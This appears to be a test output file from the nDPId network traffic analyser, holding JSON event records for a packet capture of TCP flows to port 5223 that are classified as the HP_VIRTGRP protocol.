00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614861892925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861892925,"pkt":"eJS0JASgYDjgxTWgCABFAAA85WdAAD8GMNnAqAJkoCzCQudAFGcyIeJoAAAAAKAC\/\/9iNQAAAgQFtAQCCAoAALAcAAAAAAEDAwg="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614861892952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861892952,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn50AGwaaHMiHiaWASchBDFwAAAgQFrAAA"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614861892955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861892955,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5WhAAD8GMOzAqAJkoCzCQudAFGcyIeJpBsGmiFAQ\/\/\/M3AAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614861898114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861998723,"flow_last_seen":1614861998723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861998723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614861998723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861998723,"pkt":"eJS0JASgYDjgxTWgCABFAAA8bUJAAD8GqP7AqAJkoCzCQue8FGe3KQNZAAAAAKAC\/\/8fjgAAAgQFtAQCCAoAAkxNAAAAAAEDAwg="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614861998752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861998752,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn57x0ZsiytykDWmASchAM0gAAAgQFrAAA"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614861998755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861998755,"pkt":"eJS0JASgYDjgxTWgCABFAAAobUNAAD8GqRHAqAJkoCzCQue8FGe3KQNadGbIs1AQ\/\/+WlwAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861892925,"flow_last_seen":1614861892925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614861892925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861892925,"pkt":"eJS0JASgYDjgxTWgCABFAAA85WdAAD8GMNnAqAJkoCzCQudAFGcyIeJoAAAAAKAC\/\/9iNQAAAgQFtAQCCAoAALAcAAAAAAEDAwg="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614861892952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861892952,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn50AGwaaHMiHiaWASchBDFwAAAgQFrAAA"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614861892955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861892955,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5WhAAD8GMOzAqAJkoCzCQudAFGcyIeJpBsGmiFAQ\/\/\/M3AAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614861898114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861998723,"flow_last_seen":1614861998723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861998723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614861998723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861998723,"pkt":"eJS0JASgYDjgxTWgCABFAAA8bUJAAD8GqP7AqAJkoCzCQue8FGe3KQNZAAAAAKAC\/\/8fjgAAAgQFtAQCCAoAAkxNAAAAAAEDAwg="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614861998752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861998752,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn57x0ZsiytykDWmASchAM0gAAAgQFrAAA"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614861998755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861998755,"pkt":"eJS0JASgYDjgxTWgCABFAAAobUNAAD8GqRHAqAJkoCzCQue8FGe3KQNadGbIs1AQ\/\/+WlwAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":45,"total-skipped-flows":0,"total-l4-data-len":1566,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1614876808445}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614876808445,"flow_last_seen":1614876808445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614876808445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614876808445,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MDtAAD8G5gXAqAJkoCzCQuoQFGeH4ylZAAAAAKAC\/\/91KwAAAgQFtAQCCAoAZP0\/AAAAAAEDAwg="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614876808474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614876808474,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn6hA0hHo5h+MpWmASchCiHwAAAgQFrAAA"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614876808478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614876808478,"pkt":"eJS0JASgYDjgxTWgCABFAAAoMDxAAD8G5hjAqAJkoCzCQuoQFGeH4ylaNIR6OlAQ\/\/8r5QAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614876808445,"flow_last_seen":1614876808445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614876808445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614876808445,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MDtAAD8G5gXAqAJkoCzCQuoQFGeH4ylZAAAAAKAC\/\/91KwAAAgQFtAQCCAoAZP0\/AAAAAAEDAwg="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614876808474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614876808474,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn6hA0hHo5h+MpWmASchCiHwAAAgQFrAAA"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614876808478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614876808478,"pkt":"eJS0JASgYDjgxTWgCABFAAAoMDxAAD8G5hjAqAJkoCzCQuoQFGeH4ylaNIR6OlAQ\/\/8r5QAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":61,"packets-processed":60,"total-skipped-flows":0,"total-l4-data-len":2088,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":28,"global_ts_msec":1614877863379}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614877863379,"flow_last_seen":1614877863379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614877863379,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1614877863379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614877863379,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nQJAAD8GeT7AqAJkoCzCQpzYFGd4ZLUSAAAAAKAC\/\/8PXgAAAgQFtAQCCAoAcTP+AAAAAAEDAwg="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1614877863406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614877863406,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnnNj+cl67eGS1E2ASchDErAAAAgQFrAAA"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1614877863410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614877863410,"pkt":"eJS0JASgYDjgxTWgCABFAAAonQNAAD8GeVHAqAJkoCzCQpzYFGd4ZLUT\/nJevFAQ\/\/9OcgAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614877863379,"flow_last_seen":1614877863379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614877863379,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1614877863379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614877863379,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nQJAAD8GeT7AqAJkoCzCQpzYFGd4ZLUSAAAAAKAC\/\/8PXgAAAgQFtAQCCAoAcTP+AAAAAAEDAwg="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1614877863406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614877863406,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnnNj+cl67eGS1E2ASchDErAAAAgQFrAAA"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1614877863410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614877863410,"pkt":"eJS0JASgYDjgxTWgCABFAAAonQNAAD8GeVHAqAJkoCzCQpzYFGd4ZLUT\/nJevFAQ\/\/9OcgAA"}
